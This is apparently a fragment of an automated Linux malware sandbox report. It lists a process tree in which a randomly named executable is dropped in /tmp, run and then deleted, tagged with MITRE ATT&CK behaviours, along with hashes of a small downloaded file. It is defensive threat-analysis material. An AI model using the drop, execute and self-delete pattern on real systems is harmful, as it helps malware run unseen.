- File and Directory Permissions Modification
PID:1007
-
-
/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97